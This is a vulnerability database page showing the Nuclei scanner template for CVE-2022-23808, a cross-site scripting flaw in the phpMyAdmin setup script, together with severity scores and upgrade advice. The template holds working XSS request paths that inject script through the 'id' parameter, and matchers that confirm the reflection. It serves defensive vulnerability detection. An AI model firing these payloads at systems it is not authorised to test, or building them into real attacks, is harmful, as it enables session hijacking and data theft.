Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-23808
HistoryFeb 14, 2022 - 11:43 a.m.

phpMyAdmin < 5.1.2 - Cross-Site Scripting

2022-02-1411:43:04
ProjectDiscovery
github.com
3

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.3 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.01 Low

EPSS

Percentile

83.8%

An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.

id: CVE-2022-23808

info:
  name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
  author: cckuailong,daffainfo
  severity: medium
  description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability.
  reference:
    - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
    - https://github.com/dipakpanchal456/CVE-2022-23808
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23808
    - https://www.phpmyadmin.net/security/PMASA-2022-2/
    - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23808
    cwe-id: CWE-79
    epss-score: 0.00743
    epss-percentile: 0.78912
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query: http.component:"phpmyadmin"
  tags: cve,cve2022,phpmyadmin,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
      - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"></script><script>alert(document.domain)</script>"
          - "<h2>Add a new server</h2>"
          - "<title>phpMyAdmin setup"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022038d5ba39a2b759095a3f8426c738ce15cf6c83b54e32b080e617ac13d733503a022100e570ecb30aa4d1b1fe02f8867294888554e1bb76b68135ab78cb7e93cf859e4e:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.3 Medium

AI Score

Confidence

High

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.01 Low

EPSS

Percentile

83.8%